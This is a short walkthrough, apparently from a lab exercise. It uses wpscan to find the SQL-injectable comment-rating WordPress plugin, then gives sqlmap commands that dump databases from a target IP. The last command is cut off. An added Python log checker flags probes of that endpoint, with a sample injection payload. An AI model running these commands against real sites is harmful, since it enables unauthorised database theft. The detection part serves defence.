Start a scan with wpscan by running wpscan --url http://219.153.49.228:48780 --enumerate vp, which enumerates the WordPress plugins that have known vulnerabilities.
The scan reports a vulnerable plugin. [1566903968447592.png]
Open the link and locate the injection point define('URL', $url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_'), then construct the URL http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a
Run sqlmap to enumerate the databases, tables, columns and field values:
sqlmap -u "http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a" --dbs --batch;
sqlmap -u "http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a" -D "test" --tables;
sqlmap -u "http://219.153.49.228:48780/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&pa
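From the defender's side, requests like the ones above stand out in the web server's access log. The following is an added example, not part of the original write-up: it flags requests to ck-processkarma.php whose id is not a plain integer or that carry a sqlmap user agent. The combined log format, the sample log lines and the assumption that legitimate requests always send a numeric comment id are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Plugin endpoint named on the page.
TARGET = "/wp-content/plugins/comment-rating/ck-processkarma.php"

# Client IP, request URI and user agent of a combined-format access log entry.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def suspicious_requests(lines):
    """Return (ip, reason) for each request to TARGET that looks like probing."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["uri"])
        if parts.path != TARGET:
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared in clear.
        ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
        if len(ids) != 1:
            hits.append((m["ip"], "missing or repeated id"))
        elif not (ids[0].isascii() and ids[0].isdigit()):
            # Assumption: a legitimate id is always a numeric comment id.
            hits.append((m["ip"], "non-numeric id"))
        elif "sqlmap" in m["ua"].lower():
            hits.append((m["ip"], "sqlmap user agent"))
    return hits

def _sample(ip, raw_id, ua):
    # Builds one constructed log line; addresses are documentation ranges.
    return (f'{ip} - - [01/Sep/2019:10:00:00 +0000] "GET {TARGET}?id={raw_id}'
            f'&action=add&path=a HTTP/1.1" 200 31 "-" "{ua}"')

# Constructed sample input, not taken from the page.
SAMPLE = [
    _sample("198.51.100.7", "12", "Mozilla/5.0"),
    _sample("203.0.113.9", "1%27%20AND%20%271%27%3D%271", "Mozilla/5.0"),
    _sample("203.0.113.9", "1", "sqlmap/1.0 (constructed)"),
    '198.51.100.7 - - [01/Sep/2019:10:00:05 +0000] "GET /index.php?id=abc '
    'HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reason in suspicious_requests(SAMPLE):
        print(ip, reason)
```

The check only sees parameters sent in the query string; requests that move the parameter into a POST body need the same rule applied at a WAF or in application logging.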